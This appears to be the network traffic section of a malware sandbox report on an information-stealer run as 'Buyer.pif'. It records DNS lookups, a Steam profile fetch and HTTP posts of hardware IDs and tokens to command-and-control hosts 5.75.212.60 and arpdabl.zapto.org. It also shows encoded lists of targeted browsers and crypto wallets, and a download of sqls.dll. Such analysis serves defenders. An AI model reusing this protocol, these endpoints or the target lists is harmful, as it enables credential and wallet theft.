                                                                                                  Jul 26, 2024 19:58:37.669512033 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.684159994 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.684200048 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.684238911 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.684243917 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.684437037 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.684437037 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.685853958 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.685895920 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.685925961 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.685936928 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.685949087 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.685971975 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.712177038 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.712199926 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.712297916 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.712321043 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.712363958 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.714610100 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.714628935 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.714689016 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.714694023 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.714720011 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.714732885 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.717308998 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.717327118 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.717381001 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.717386007 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.717422009 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.762468100 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.762510061 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.762710094 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.762710094 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.762737989 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.762800932 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.764786005 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.764841080 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.764877081 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.764882088 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.764910936 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.764931917 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.766671896 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.766714096 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.766740084 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.766745090 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.766765118 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.766778946 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.787341118 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.787383080 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.787503958 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.787503958 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.787527084 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.787573099 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.804909945 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.804949045 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.804979086 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.804985046 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.805011034 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.805043936 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.816556931 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.816600084 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.816622972 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.816627979 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.816667080 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.816685915 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.824295998 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.824337959 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.824367046 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.824371099 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.824397087 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.824408054 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:37.833656073 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.833697081 CEST443497265.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:37.833739042 CEST49726443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004245043 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004265070 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004332066 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004388094 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004432917 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004663944 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004693985 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004808903 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004848957 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:45.004885912 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.004924059 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:45.005106926 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.219654083 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.219821930 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.219923973 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.219924927 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.220264912 CEST49731443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.220333099 CEST443497315.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.267620087 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.267709017 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:46.267786980 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.268084049 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:46.268119097 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.015161037 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.016652107 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.017087936 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.017111063 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.018722057 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.018734932 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.697335958 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.697458982 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.697482109 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.697576046 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.697663069 CEST49732443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.697700024 CEST443497325.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.698916912 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.699002981 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:47.699103117 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.699332952 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:47.699368954 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:48.364176989 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:48.364413977 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:48.364804029 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:48.364857912 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:48.366161108 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:48.366178036 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.012876987 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.012967110 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.013061047 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:49.013061047 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:49.013151884 CEST49733443192.168.2.55.75.212.60
                                                                                                  Jul 26, 2024 19:58:49.013190985 CEST443497335.75.212.60192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.034116983 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.043857098 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.043946028 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.044064045 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.044167995 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:49.050983906 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.051197052 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.051228046 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.051259995 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.953210115 CEST804973477.91.101.71192.168.2.5
                                                                                                  Jul 26, 2024 19:58:49.953417063 CEST4973480192.168.2.577.91.101.71
                                                                                                  Jul 26, 2024 19:58:52.727767944 CEST4973480192.168.2.577.91.101.71
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 19:57:59.214076996 CEST | 52111 | 53 | 192.168.2.5 | 1.1.1.1
Jul 26, 2024 19:57:59.225172043 CEST | 53 | 52111 | 1.1.1.1 | 192.168.2.5
Jul 26, 2024 19:58:10.498976946 CEST | 57626 | 53 | 192.168.2.5 | 1.1.1.1
Jul 26, 2024 19:58:10.506475925 CEST | 53 | 57626 | 1.1.1.1 | 192.168.2.5
Jul 26, 2024 19:58:49.023668051 CEST | 60358 | 53 | 192.168.2.5 | 1.1.1.1
Jul 26, 2024 19:58:49.033422947 CEST | 53 | 60358 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 19:57:59.214076996 CEST | 192.168.2.5 | 1.1.1.1 | 0x5869 | Standard query (0) | BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW | A (IP address) | IN (0x0001) | false
Jul 26, 2024 19:58:10.498976946 CEST | 192.168.2.5 | 1.1.1.1 | 0x93d3 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 19:58:49.023668051 CEST | 192.168.2.5 | 1.1.1.1 | 0x7a92 | Standard query (0) | arpdabl.zapto.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 26, 2024 19:57:59.225172043 CEST | 1.1.1.1 | 192.168.2.5 | 0x5869 | Name error (3) | BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW | none | none | A (IP address) | IN (0x0001) | false
Jul 26, 2024 19:58:10.506475925 CEST | 1.1.1.1 | 192.168.2.5 | 0x93d3 | No error (0) | steamcommunity.com |  | 23.192.247.89 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 19:58:49.033422947 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a92 | No error (0) | arpdabl.zapto.org |  | 77.91.101.71 | A (IP address) | IN (0x0001) | false
                                                                                                  • steamcommunity.com
                                                                                                  • 5.75.212.60
                                                                                                  • arpdabl.zapto.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49734 | 77.91.101.71 | 80 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 19:58:49.044064045 CEST | 329 | OUT | POST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJK
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: arpdabl.zapto.org
                                                                                                  Content-Length: 3257
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
Jul 26, 2024 19:58:49.044167995 CEST | 3257 | OUT | Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------GCGIDGCGIEGDGD
Jul 26, 2024 19:58:49.953210115 CEST | 161 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx/1.22.1
                                                                                                  Date: Fri, 26 Jul 2024 17:58:49 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 0
                                                                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 23.192.247.89 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:11 UTC | 119 | OUT | GET /profiles/76561199747278259 HTTP/1.1
                                                                                                  Host: steamcommunity.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:11 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                  Cache-Control: no-cache
                                                                                                  Date: Fri, 26 Jul 2024 17:58:11 GMT
                                                                                                  Content-Length: 34725
                                                                                                  Connection: close
                                                                                                  Set-Cookie: sessionid=9f9e4d729e0920652d8fedd0; Path=/; Secure; SameSite=None
                                                                                                  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-07-26 17:58:11 UTC | 14514 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-07-26 17:58:11 UTC | 10062 | IN | Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-07-26 17:58:11 UTC | 10149 | IN | Data Ascii: kamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:12 UTC | 230 | OUT | GET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:13 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
2024-07-26 17:58:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:13 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 279
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:13 UTC | 279 | OUT | Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="hwid"B9201D5C61A33973544187-a33c7340-61ca-11ee-8c18-806e6f6e6963------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------
2024-07-26 17:58:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:14 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 3a1|1|1|1|77eaecbc48c2111ef5dc32770e101018|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49711 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:15 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:15 UTC | 331 | OUT | Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------JJJJDAAECGHDGDGCGHDBCont
2024-07-26 17:58:15 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:15 UTC | 1564 | IN | Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:16 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:16 UTC | 331 | OUT | Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------GIJJKKJJDAAAAAKFHJJDCont
2024-07-26 17:58:17 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:17 UTC | 5685 | IN | Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49715 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:17 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:17 UTC | 332 | OUT | Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IIJDBGDGCGDAKFIDGIDBCont
2024-07-26 17:58:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:18 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49716 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:19 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 6129
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:19 UTC | 6129 | OUT | Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FHIECBAFBFHIJKFIJDAKCont
2024-07-26 17:58:19 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:19 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49717 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:20 UTC | 238 | OUT | GET /sqls.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:21 UTC | 261 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:20 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Friday, 26-Jul-2024 17:58:20 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
